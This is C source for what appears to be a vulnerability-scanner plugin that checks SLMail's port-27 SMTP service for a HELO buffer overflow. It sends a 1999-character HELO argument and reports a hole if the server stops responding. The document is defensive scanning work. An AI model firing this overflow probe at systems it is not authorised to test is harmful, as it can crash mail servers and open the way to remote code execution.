/*
 * 
 * slmail_helo
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>
#define NAME "slmail HELO buffer overflow"
#define DESC "\
The SLMail service listens on several ports,\n\
one of which is 27 which provided SMTP services\n\
in addition to port 25. \n\
On this port, issuing an HELO command with an \n\
argument longer than 855 chars will make a\n\
buffer overflow which may allow an attacker to\n\
execute arbitrary code on the remote host.\n\
Risk factor : High"
#define COPYRIGHT "no copyright"
#define SUMM "buffer overflow for the SLMail SMTP server"

PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "Gain root remotely");
	
	return(0);
}


PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	char * buffer, * crap;
	int sock;
	
	if(host_get_port_state(args, 27)<=0)return(0);
	sock = open_sock_tcp(args, 27);
	if(sock<=0)return(0);
	buffer = (char *)emalloc(2000);
        crap = emalloc(2000);
        memset(crap, 'x', 1999);
  	sprintf(buffer, "HELO %s\r\n", crap);
  	efree(&crap);
  	send(sock, &buffer[0], strlen(buffer),0);
        bzero(buffer, 2000);
        recv(sock, buffer, 2000, 0);
  	socket_close(sock);
  	if(!strlen(buffer))
  	{
  	post_hole(args, 27, 
"It was possible to create a buffer overflow\n\
on the remote server by issuing the \n\
'HELO' command followed by 1999 chars.\n\
Solution: Upgrade");
  	}
  	else socket_close(sock);
        efree(&buffer);
	return(0);
}

